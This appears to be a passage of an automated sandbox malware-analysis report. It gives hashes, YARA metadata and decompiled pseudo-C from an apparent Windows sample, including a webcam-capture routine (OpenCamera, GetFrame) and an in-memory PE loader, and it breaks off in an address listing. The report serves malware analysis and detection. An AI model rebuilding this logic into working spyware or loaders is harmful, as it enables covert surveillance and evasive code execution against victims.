                                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041714B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                • String ID: Alarm triggered
                                                                                                • API String ID: 614609389-2816303416
                                                                                                • Opcode ID: 62e353c317bc57baaa5e3695c25239c50f512b2745c4d5b14febfbc299d0b12c
                                                                                                • Instruction ID: 029b799d6ce9f9b414df5b6a63bde51230d83b0af7215cd46c917e2105275d48
                                                                                                • Opcode Fuzzy Hash: 62e353c317bc57baaa5e3695c25239c50f512b2745c4d5b14febfbc299d0b12c
                                                                                                • Instruction Fuzzy Hash: FDE01226B40220779510376A6D0FD6F3D29DAC2B65B01006EFA0556196DD950851C6FB
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004396EA, Relevance: 7.7, APIs: 5, Instructions: 222COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 96%
                                                                                                			E004396EA(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				void* _t106;
				intOrPtr _t108;
				intOrPtr _t109;
				int _t110;
				short* _t113;
				int _t114;
				int _t116;
				signed int _t117;

				_t106 = __edx;
				_t59 =  *0x46c00c; // 0x4cc22724
				_v8 = _t59 ^ _t117;
				_t61 = _a4;
				_t91 = _a12;
				_t116 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t113 = _a8;
				_v24 = _t113;
				if(_t61 == 0 || _t91 != 0) {
					if(_t113 != 0) {
						E00436267(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
								if(_t64 == 0 || _v20 != _t116) {
									L55:
									_t65 = E00438932();
									_t114 = _t113 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t114 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t113 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t114 = _t116;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t113 =  &(_t113[1]);
								_t116 = _t116 + 1;
								_t68 =  *_t113 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t108 = _v44;
						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
							if( *((intOrPtr*)(_t108 + 4)) != 1) {
								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
								if(_t114 == 0) {
									if(_v20 != _t116 || GetLastError() != 0x7a) {
										L45:
										_t71 = E00438932();
										_t116 = _t116 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t109 = _v44;
											_t103 =  *(_t109 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
											_t93 = _a12;
											_t110 = _t74;
											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
												goto L55;
											}
											if(_t110 + _t114 > _t93) {
												goto L56;
											}
											_t76 = _t116;
											_v32 = _t76;
											if(_t110 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t114 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
												 *((char*)(_t105 + _t114)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t114 = _t114 + 1;
												_v32 = _t76;
												if(_t76 < _t110) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t116) {
									goto L45;
								}
								_t28 = _t114 - 1; // -1
								_t116 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
								if(_t116 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t116 - 1] == 0) {
										_t116 = _t116 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t113;
							_v24 = _t91;
							while( *_t83 != _t116) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t116 &&  *_t83 == _t116) {
								_t91 = (_t83 - _t113 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						while( *_t113 <= 0xff) {
							_t98[_t116] =  *_t113;
							_t85 =  *_t113;
							_t113 =  &(_t113[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t116 = _t116 + 1;
							if(_t116 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E00438932())) = 0x16;
					E00437709();
					goto L59;
				} else {
					L59:
					return E00430A5B(_v8 ^ _t117);
				}
			}






































                                                                                                0x004396ea
                                                                                                0x004396f2
                                                                                                0x004396f9
                                                                                                0x004396fc
                                                                                                0x00439700
                                                                                                0x00439704
                                                                                                0x00439706
                                                                                                0x00439709
                                                                                                0x0043970d
                                                                                                0x00439710
                                                                                                0x00439715
                                                                                                0x00439724
                                                                                                0x00439744
                                                                                                0x00439749
                                                                                                0x0043974e
                                                                                                0x004398eb
                                                                                                0x004398f4
                                                                                                0x00439926
                                                                                                0x0043992e
                                                                                                0x0043993a
                                                                                                0x0043993a
                                                                                                0x0043993f
                                                                                                0x00439942
                                                                                                0x00000000
                                                                                                0x00439935
                                                                                                0x00439935
                                                                                                0x00439935
                                                                                                0x00439948
                                                                                                0x0043994c
                                                                                                0x00439951
                                                                                                0x00439951
                                                                                                0x00000000
                                                                                                0x00439958
                                                                                                0x0043992e
                                                                                                0x004398f6
                                                                                                0x004398fc
                                                                                                0x00439914
                                                                                                0x00439914
                                                                                                0x00000000
                                                                                                0x00439914
                                                                                                0x00439903
                                                                                                0x00439908
                                                                                                0x0043990b
                                                                                                0x0043990c
                                                                                                0x00439912
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00439912
                                                                                                0x00000000
                                                                                                0x00439903
                                                                                                0x00439754
                                                                                                0x0043975d
                                                                                                0x00439797
                                                                                                0x00439810
                                                                                                0x00439814
                                                                                                0x0043982a
                                                                                                0x004398db
                                                                                                0x004398db
                                                                                                0x004398e0
                                                                                                0x004398e3
                                                                                                0x00000000
                                                                                                0x0043983f
                                                                                                0x00439841
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00439847
                                                                                                0x0043984a
                                                                                                0x0043984a
                                                                                                0x0043984d
                                                                                                0x00439853
                                                                                                0x00439857
                                                                                                0x00439857
                                                                                                0x00439869
                                                                                                0x0043986f
                                                                                                0x00439872
                                                                                                0x00439876
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043989b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004398a1
                                                                                                0x004398a3
                                                                                                0x004398a8
                                                                                                0x004398c8
                                                                                                0x004398cb
                                                                                                0x004398ce
                                                                                                0x004398d3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004398d9
                                                                                                0x004398aa
                                                                                                0x004398ad
                                                                                                0x004398ad
                                                                                                0x004398b1
                                                                                                0x004398b6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004398bf
                                                                                                0x004398c0
                                                                                                0x004398c1
                                                                                                0x004398c6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004398c6
                                                                                                0x00000000
                                                                                                0x004398ad
                                                                                                0x00000000
                                                                                                0x0043984a
                                                                                                0x0043982a
                                                                                                0x00439819
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043981f
                                                                                                0x0043981f
                                                                                                0x00000000
                                                                                                0x0043981f
                                                                                                0x0043979b
                                                                                                0x004397c1
                                                                                                0x004397d4
                                                                                                0x004397d8
                                                                                                0x00000000
                                                                                                0x004397e8
                                                                                                0x004397f0
                                                                                                0x004397f6
                                                                                                0x004397f6
                                                                                                0x00000000
                                                                                                0x004397f0
                                                                                                0x004397d8
                                                                                                0x0043979d
                                                                                                0x0043979f
                                                                                                0x004397a2
                                                                                                0x004397a7
                                                                                                0x004397aa
                                                                                                0x004397aa
                                                                                                0x004397ae
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004397ae
                                                                                                0x004397b3
                                                                                                0x004397c0
                                                                                                0x004397c0
                                                                                                0x00000000
                                                                                                0x004397b3
                                                                                                0x00439761
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043976c
                                                                                                0x00439777
                                                                                                0x0043977a
                                                                                                0x0043977d
                                                                                                0x00439783
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00439789
                                                                                                0x0043978c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043978e
                                                                                                0x00000000
                                                                                                0x0043976c
                                                                                                0x0043972b
                                                                                                0x00439731
                                                                                                0x00000000
                                                                                                0x0043971b
                                                                                                0x0043995a
                                                                                                0x0043996a
                                                                                                0x0043996a

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8d4be186497c31324fbecd1428ab1a8062156cfd5fe5274e898eb7c5a7b29789
                                                                                                • Instruction ID: 065f0bc0dede0ecb3b837fc5a7bcf81a28c29dc1b15ba8dd1f928077b441424a
                                                                                                • Opcode Fuzzy Hash: 8d4be186497c31324fbecd1428ab1a8062156cfd5fe5274e898eb7c5a7b29789
                                                                                                • Instruction Fuzzy Hash: 5071D071900216DBCB21DF59C884ABFBB74EF4A360F24226FE46167390D7B48D41CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00404467, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 208sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 68%
                                                                                                			E00404467(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char** _a8, signed int _a12) {
				char _v8;
				void* _v40;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v76;
				void* __esi;
				void* __ebp;
				void* _t26;
				char** _t28;
				intOrPtr* _t30;
				char* _t38;
				intOrPtr _t48;
				signed int _t57;
				signed int _t59;
				char* _t62;
				void* _t66;
				signed int _t67;
				void* _t69;
				signed int _t78;
				void* _t81;
				void* _t129;
				signed int _t131;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t141;
				void* _t144;
				void* _t145;
				intOrPtr* _t146;

				_push(__edi);
				_t125 = _a8;
				_t129 = __ecx;
				_t26 = E004027CC(__ecx, _a8);
				_t81 = _t129;
				_t152 = _t26;
				if(_t26 == 0) {
					_push(__ebx);
					E004028AB(_t81, __edx, 0);
					_t28 = E00402231();
					_t78 = _a12;
					_a8 = _t28;
					_t120 =  *_t28;
					__eflags =  !_t120 - _t78;
					if( !_t120 <= _t78) {
						E004028CA(_t129);
						asm("int3");
						_push(_t129);
						_t30 = E00401F87( &_v8);
						E00404287( &_v8,  &_v44, 4, 0xffffffff);
						_t144 = (_t141 & 0xfffffff8) - 0xc;
						E004020DE(_t78, _t144, _t120, __eflags, 0x46e250);
						_t145 = _t144 - 0x18;
						E004020DE(_t78, _t145, _t120, __eflags,  &_v60);
						E00417E68( &_v76, _t120);
						_t146 = _t145 + 0x30;
						_t131 =  *_t30 - 0x3c;
						__eflags = _t131;
						if(__eflags == 0) {
							E00401E3B( &_v52, _t120, __eflags, 0);
							_t38 = E0040247B();
							E00401F87(E00401E3B( &_v56, _t120, __eflags, 0));
							_t120 = _t38;
							_t133 = E0040F6D9();
							__eflags = _t133;
							if(_t133 != 0) {
								 *0x46dac4 = E0040F96F(_t133, "OpenCamera");
								 *0x46dac0 = E0040F96F(_t133, "CloseCamera");
								_t48 = E0040F96F(_t133, "GetFrame");
								_t120 = "FreeFrame";
								 *0x46dac8 = _t48;
								 *0x46dabc = E0040F96F(_t133, "FreeFrame");
								 *0x46daaa = 1;
								E004020DE(_t78, _t146 - 0x18, "FreeFrame", __eflags, 0x46e1b8);
								_push(0x1b);
								goto L23;
							}
						} else {
							_t134 = _t131 - 1;
							__eflags = _t134;
							if(_t134 == 0) {
								__eflags =  *0x46da77;
								if(__eflags != 0) {
									goto L20;
								}
							} else {
								_t135 = _t134 - 1;
								__eflags = _t135;
								if(_t135 == 0) {
									 *0x46dac0();
									 *0x46da77 = 0;
								} else {
									_t136 = _t135 - 1;
									__eflags = _t136;
									if(_t136 == 0) {
										_t57 =  *0x46dac4();
										 *0x46da77 = _t57;
										__eflags = _t57;
										if(__eflags == 0) {
											goto L15;
										} else {
											L20:
											_t120 = E004374E4(_t52, E00401F87(E00401E3B( &_v52, _t120, __eflags, 0)));
											E004046FF(_a4, _t54, __eflags);
										}
									} else {
										_t137 = _t136 - 1;
										__eflags = _t137;
										if(_t137 == 0) {
											_t59 =  *0x46dac4();
											 *0x46da77 = _t59;
											__eflags = _t59;
											if(__eflags == 0) {
												L15:
												E004020DE(_t78, _t146 - 0x18, _t120, __eflags, 0x46e1b8);
												_push(0x41);
												L23:
												E00404BB7(_t78, _a4, _t120, __eflags);
											} else {
												_t62 = E004374E4(_t60, E00401F87(E00401E3B( &_v52, _t120, __eflags, _t137)));
												 *_t146 = 0x3e8;
												Sleep(??);
												_t120 = _t62;
												E004046FF(_a4, _t62, __eflags);
												 *0x46dac0();
											}
										}
									}
								}
							}
						}
						E00401E66( &_v52, _t120);
						E00401FB9();
						E00401FB9();
						__eflags = 0;
						return 0;
					} else {
						_t65 =  &(_t120[_t78]);
						_a12 =  &(_t120[_t78]);
						__eflags = _t78;
						if(__eflags != 0) {
							_push(0);
							_t67 = E00402807(_t78, _t129, _t120, _t125, __eflags, _t65);
							__eflags = _t67;
							if(_t67 != 0) {
								_push( *_a8);
								_t69 = E0040221B(_t129);
								E0040159F(E0040221B(_t129) + _t78 * 2, _t69);
								_push(_t78);
								E0040158B(E0040221B(_t129), _t125);
								E0040287A(_a12);
							}
						}
						_t66 = _t129;
						goto L7;
					}
				} else {
					_t66 = E004035B1(__ebx, _t129, __edx, _t125 - E0040221B(_t81) >> 1, _t129, _t152, _t81, _t129, _t125 - E0040221B(_t81) >> 1, _a12);
					L7:
					return _t66;
				}
			}




































                                                                                                0x0040446b
                                                                                                0x0040446c
                                                                                                0x0040446f
                                                                                                0x00404472
                                                                                                0x00404477
                                                                                                0x00404479
                                                                                                0x0040447b
                                                                                                0x00404495
                                                                                                0x00404498
                                                                                                0x0040449f
                                                                                                0x004044a4
                                                                                                0x004044a7
                                                                                                0x004044aa
                                                                                                0x004044b0
                                                                                                0x004044b2
                                                                                                0x00404513
                                                                                                0x00404518
                                                                                                0x00404525
                                                                                                0x00404526
                                                                                                0x00404539
                                                                                                0x0040453e
                                                                                                0x00404548
                                                                                                0x0040454d
                                                                                                0x00404557
                                                                                                0x00404560
                                                                                                0x00404565
                                                                                                0x00404568
                                                                                                0x00404568
                                                                                                0x0040456b
                                                                                                0x0040464b
                                                                                                0x00404652
                                                                                                0x00404666
                                                                                                0x0040466b
                                                                                                0x00404674
                                                                                                0x00404676
                                                                                                0x00404678
                                                                                                0x0040468b
                                                                                                0x0040469c
                                                                                                0x004046a3
                                                                                                0x004046a8
                                                                                                0x004046ad
                                                                                                0x004046bc
                                                                                                0x004046c3
                                                                                                0x004046cf
                                                                                                0x004046d4
                                                                                                0x00000000
                                                                                                0x004046d4
                                                                                                0x00404571
                                                                                                0x00404571
                                                                                                0x00404571
                                                                                                0x00404574
                                                                                                0x00404610
                                                                                                0x00404617
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040457a
                                                                                                0x0040457a
                                                                                                0x0040457a
                                                                                                0x0040457d
                                                                                                0x004045fe
                                                                                                0x00404604
                                                                                                0x0040457f
                                                                                                0x0040457f
                                                                                                0x0040457f
                                                                                                0x00404582
                                                                                                0x004045ed
                                                                                                0x004045f3
                                                                                                0x004045f8
                                                                                                0x004045fa
                                                                                                0x00000000
                                                                                                0x004045fc
                                                                                                0x0040461d
                                                                                                0x00404639
                                                                                                0x0040463b
                                                                                                0x0040463b
                                                                                                0x00404584
                                                                                                0x00404584
                                                                                                0x00404584
                                                                                                0x00404587
                                                                                                0x0040458d
                                                                                                0x00404593
                                                                                                0x00404598
                                                                                                0x0040459a
                                                                                                0x004045d7
                                                                                                0x004045e1
                                                                                                0x004045e6
                                                                                                0x004046d6
                                                                                                0x004046d9
                                                                                                0x0040459c
                                                                                                0x004045ae
                                                                                                0x004045b5
                                                                                                0x004045bc
                                                                                                0x004045c5
                                                                                                0x004045c7
                                                                                                0x004045cc
                                                                                                0x004045cc
                                                                                                0x0040459a
                                                                                                0x00404587
                                                                                                0x00404582
                                                                                                0x0040457d
                                                                                                0x00404574
                                                                                                0x004046e2
                                                                                                0x004046eb
                                                                                                0x004046f3
                                                                                                0x004046f8
                                                                                                0x004046fe
                                                                                                0x004044b4
                                                                                                0x004044b4
                                                                                                0x004044b7
                                                                                                0x004044ba
                                                                                                0x004044bc
                                                                                                0x004044be
                                                                                                0x004044c3
                                                                                                0x004044c8
                                                                                                0x004044ca
                                                                                                0x004044d1
                                                                                                0x004044d3
                                                                                                0x004044e4
                                                                                                0x004044ee
                                                                                                0x004044f6
                                                                                                0x00404503
                                                                                                0x00404503
                                                                                                0x004044ca
                                                                                                0x00404508
                                                                                                0x00000000
                                                                                                0x0040450a
                                                                                                0x0040447d
                                                                                                0x0040448e
                                                                                                0x0040450b
                                                                                                0x0040450e
                                                                                                0x0040450e

                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,?), ref: 004045BC
                                                                                                  • Part of subcall function 004046FF: __EH_prolog.LIBCMT ref: 00404704
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prologSleep
                                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                • API String ID: 3469354165-3547787478
                                                                                                • Opcode ID: 9a7fb9ab8d5fe1e9b19520489653bd00a85e42315cfc21318e12cdca55488016
                                                                                                • Instruction ID: 05ece077fded5990d91df96ac5666eaa8e0806417524fa1e4efd2b664c8b215c
                                                                                                • Opcode Fuzzy Hash: 9a7fb9ab8d5fe1e9b19520489653bd00a85e42315cfc21318e12cdca55488016
                                                                                                • Instruction Fuzzy Hash: F651D6B1B0421067CA14BB76C85AA6E37659BC1318F00053FF906BB7E2EF7D8905879E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040F6E5, Relevance: 7.7, APIs: 5, Instructions: 206memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E0040F6E5(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v52;
				char _v56;
				signed int _t59;
				signed int _t61;
				void* _t64;
				void* _t67;
				signed int _t72;
				void* _t78;
				signed int _t79;
				void* _t80;
				signed int _t82;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				void* _t92;
				signed int _t93;
				intOrPtr* _t96;
				signed int _t98;
				signed int _t113;
				void* _t115;
				signed int _t118;
				void* _t124;
				signed int _t126;
				intOrPtr _t128;
				signed int _t129;
				void* _t130;
				signed int _t131;
				void* _t132;
				void* _t133;

				_t115 = 0x40;
				_v16 = __edx;
				_v8 = __ecx;
				_t124 = 0;
				if(E0040F188(__edx, _t115) == 0) {
					L33:
					return 0;
				}
				if( *((intOrPtr*)(__ecx)) == 0x5a4d) {
					_t59 = E0040F188(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
					__eflags = _t59;
					if(_t59 == 0) {
						goto L33;
					}
					_t96 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
					__eflags =  *_t96 - 0x4550;
					if( *_t96 != 0x4550) {
						goto L2;
					}
					__eflags =  *((intOrPtr*)(_t96 + 4)) - 0x14c;
					if( *((intOrPtr*)(_t96 + 4)) != 0x14c) {
						goto L2;
					}
					__eflags =  *(_t96 + 0x38) & 0x00000001;
					if(( *(_t96 + 0x38) & 0x00000001) != 0) {
						goto L2;
					}
					_t118 =  *(_t96 + 6) & 0x0000ffff;
					_t61 =  *(_t96 + 0x14) & 0x0000ffff;
					__eflags = _t118;
					if(_t118 == 0) {
						L14:
						__imp__GetNativeSystemInfo( &_v56);
						_t128 = E0040F177( *((intOrPtr*)(_t96 + 0x50)), _v52);
						_v20 = _t128;
						_t64 = E0040F177(_t124, _v52);
						__eflags = _t128 - _t64;
						if(_t128 != _t64) {
							goto L2;
						}
						_push(0);
						_t129 = E0040F681( *((intOrPtr*)(_t96 + 0x34)), _t128, 0x3000, 4);
						_t133 = _t132 + 0x14;
						_v12 = _t129;
						__eflags = _t129;
						if(_t129 != 0) {
							L18:
							_t67 = HeapAlloc(GetProcessHeap(), 8, 0x40);
							_t126 = _t67;
							__eflags = _t126;
							if(_t126 != 0) {
								 *(_t126 + 4) = _t129;
								 *(_t126 + 0x34) =  *(_t126 + 0x34) & 0x00000000;
								 *((intOrPtr*)(_t126 + 0x1c)) = E0040F681;
								 *(_t126 + 0x14) = ( *(_t96 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
								 *((intOrPtr*)(_t126 + 0x20)) = E0040F698;
								 *((intOrPtr*)(_t126 + 0x24)) = E0040F6AC;
								 *((intOrPtr*)(_t126 + 0x28)) = E0040F6BA;
								 *((intOrPtr*)(_t126 + 0x2c)) = E0040F6CB;
								 *((intOrPtr*)(_t126 + 0x3c)) = _v52;
								_t72 = E0040F188(_v16,  *((intOrPtr*)(_t96 + 0x54)));
								__eflags = _t72;
								if(_t72 == 0) {
									L32:
									E0040FA85(_t126);
									goto L33;
								}
								_push(0);
								_t130 = E0040F681(_t129,  *((intOrPtr*)(_t96 + 0x54)), 0x1000, 4);
								E00433360(_t130, _v8,  *((intOrPtr*)(_t96 + 0x54)));
								_t43 = _v8 + 0x3c; // 0x4540d0
								_t78 =  *_t43 + _t130;
								_t131 = _v12;
								 *_t126 = _t78;
								 *((intOrPtr*)(_t78 + 0x34)) = _t131;
								_t79 = E0040F19B(_v8, _v16, _t96, _t126);
								__eflags = _t79;
								if(_t79 == 0) {
									goto L32;
								}
								_t80 =  *_t126;
								_t123 =  *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34));
								__eflags =  *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34));
								if( *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34))) {
									_t98 = 1;
									__eflags = 1;
									 *((intOrPtr*)(_t126 + 0x18)) = 1;
								} else {
									 *((intOrPtr*)(_t126 + 0x18)) = E0040F497(_t126, _t123);
									_t98 = 1;
								}
								__eflags = E0040F53C(_t126);
								if(__eflags != 0) {
									_t82 = E0040F342(_t126, __eflags);
									__eflags = _t82;
									if(_t82 == 0) {
										goto L32;
									}
									_t83 = E0040F466(_t126);
									__eflags = _t83;
									if(_t83 == 0) {
										goto L32;
									}
									_t85 =  *( *_t126 + 0x28);
									__eflags = _t85;
									if(_t85 == 0) {
										_t54 = _t126 + 0x38;
										 *_t54 =  *(_t126 + 0x38) & 0x00000000;
										__eflags =  *_t54;
										L38:
										return _t126;
									}
									_t87 = _t85 + _t131;
									__eflags =  *(_t126 + 0x14);
									if( *(_t126 + 0x14) == 0) {
										 *(_t126 + 0x38) = _t87;
										goto L38;
									}
									_t88 =  *_t87(_t131, _t98, 0);
									__eflags = _t88;
									if(_t88 != 0) {
										 *((intOrPtr*)(_t126 + 0x10)) = _t98;
										goto L38;
									}
									SetLastError(0x45a);
								}
								goto L32;
							}
							_push(_t67);
							E0040F698(_t129, _t67, 0x8000);
							L17:
							_push(0xe);
							L3:
							SetLastError();
							goto L33;
						}
						_push(0);
						_t91 = E0040F681(0, _v20, 0x3000, 4);
						_t129 = _t91;
						_v12 = _t91;
						_t133 = _t133 + 0x14;
						__eflags = _t129;
						if(_t129 != 0) {
							goto L18;
						}
						goto L17;
					}
					_t113 = _t96 + 0x24 + _t61;
					__eflags = _t113;
					do {
						__eflags =  *(_t113 + 4);
						_t92 =  *_t113;
						if( *(_t113 + 4) != 0) {
							_t93 = _t92 +  *(_t113 + 4);
							__eflags = _t93;
						} else {
							_t93 = _t92 +  *(_t96 + 0x38);
						}
						__eflags = _t93 - _t124;
						_t124 =  >  ? _t93 : _t124;
						_t113 = _t113 + 0x28;
						_t118 = _t118 - 1;
						__eflags = _t118;
					} while (_t118 != 0);
					goto L14;
				}
				L2:
				_push(0xc1);
				goto L3;
			}






































                                                                                                0x0040f6f4
                                                                                                0x0040f6f7
                                                                                                0x0040f6fa
                                                                                                0x0040f6fd
                                                                                                0x0040f706
                                                                                                0x0040f920
                                                                                                0x00000000
                                                                                                0x0040f920
                                                                                                0x0040f714
                                                                                                0x0040f731
                                                                                                0x0040f736
                                                                                                0x0040f738
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f741
                                                                                                0x0040f743
                                                                                                0x0040f749
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f750
                                                                                                0x0040f754
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f756
                                                                                                0x0040f75a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f75c
                                                                                                0x0040f760
                                                                                                0x0040f764
                                                                                                0x0040f766
                                                                                                0x0040f78a
                                                                                                0x0040f78e
                                                                                                0x0040f79f
                                                                                                0x0040f7a3
                                                                                                0x0040f7a6
                                                                                                0x0040f7ab
                                                                                                0x0040f7ad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f7b5
                                                                                                0x0040f7c6
                                                                                                0x0040f7c8
                                                                                                0x0040f7cb
                                                                                                0x0040f7ce
                                                                                                0x0040f7d0
                                                                                                0x0040f7f6
                                                                                                0x0040f801
                                                                                                0x0040f807
                                                                                                0x0040f809
                                                                                                0x0040f80b
                                                                                                0x0040f822
                                                                                                0x0040f829
                                                                                                0x0040f833
                                                                                                0x0040f83a
                                                                                                0x0040f83d
                                                                                                0x0040f844
                                                                                                0x0040f84b
                                                                                                0x0040f852
                                                                                                0x0040f85c
                                                                                                0x0040f862
                                                                                                0x0040f867
                                                                                                0x0040f869
                                                                                                0x0040f919
                                                                                                0x0040f91b
                                                                                                0x00000000
                                                                                                0x0040f91b
                                                                                                0x0040f86f
                                                                                                0x0040f884
                                                                                                0x0040f88a
                                                                                                0x0040f899
                                                                                                0x0040f89c
                                                                                                0x0040f89e
                                                                                                0x0040f8a1
                                                                                                0x0040f8a4
                                                                                                0x0040f8a7
                                                                                                0x0040f8af
                                                                                                0x0040f8b1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f8b3
